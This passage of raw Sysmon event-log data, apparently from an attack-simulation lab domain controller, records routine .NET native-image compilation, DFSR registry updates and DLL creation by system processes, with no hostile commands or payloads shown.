ll.dll+51791 10341000x80000000000000005340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:23.018{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90B7-6005-3601-00000000A301}3532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:23.002{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90B7-6005-3601-00000000A301}3532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:23.002{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90B7-6005-3601-00000000A301}3532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000005346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:44:28.814{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\0C308890-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_0C308890-0000-0000-0000-100000000000.XML 13241300x80000000000000005345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:44:28.814{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Config SourceDWORD (0x00000001) 13241300x80000000000000005344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:44:28.814{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B.XML 13241300x80000000000000005349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:44:29.814{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\0C308890-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_0C308890-0000-0000-0000-100000000000.XML 13241300x80000000000000005348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:44:29.814{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Config SourceDWORD (0x00000001) 
13241300x80000000000000005347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:44:29.814{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B.XML 10341000x80000000000000005353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:30.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90BE-6005-3801-00000000A301}3376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:30.564{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90BE-6005-3801-00000000A301}3376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:30.564{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90BE-6005-3801-00000000A301}3376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:30.299{59A5CD1D-90B7-6005-3701-00000000A301}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b7c-0\System.Core.dll2021-01-18 13:44:30.299 10341000x80000000000000005360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:31.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90BF-6005-3A01-00000000A301}920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:31.455{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90BF-6005-3A01-00000000A301}920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:31.455{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90BF-6005-3A01-00000000A301}920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:31.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90BF-6005-3901-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:31.361{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90BF-6005-3901-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:31.361{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90BF-6005-3901-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84
d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:31.283{59A5CD1D-90BE-6005-3801-00000000A301}3376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\d30-0\System.Configuration.dll2021-01-18 13:44:31.283 10341000x80000000000000005364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:32.721{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90C0-6005-3B01-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:32.705{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90C0-6005-3B01-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:32.705{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90C0-6005-3B01-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:32.611{59A5CD1D-90BF-6005-3A01-00000000A301}920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\398-0\System.Drawing.dll2021-01-18 13:44:32.611 10341000x80000000000000005367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:33.033{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90C1-6005-3C01-00000000A301}4344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:33.033{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90C1-6005-3C01-00000000A301}4344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:33.033{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90C1-6005-3C01-00000000A301}4344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:38.752{59A5CD1D-90C1-6005-3C01-00000000A301}4344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\10f8-0\System.Data.dll2021-01-18 13:44:38.752 10341000x80000000000000005393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:39.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90C7-6005-3E01-00000000A301}4688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.674{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90C7-6005-3E01-00000000A301}4688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:39.674{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90C7-6005-3E01-00000000A301}4688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.627{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
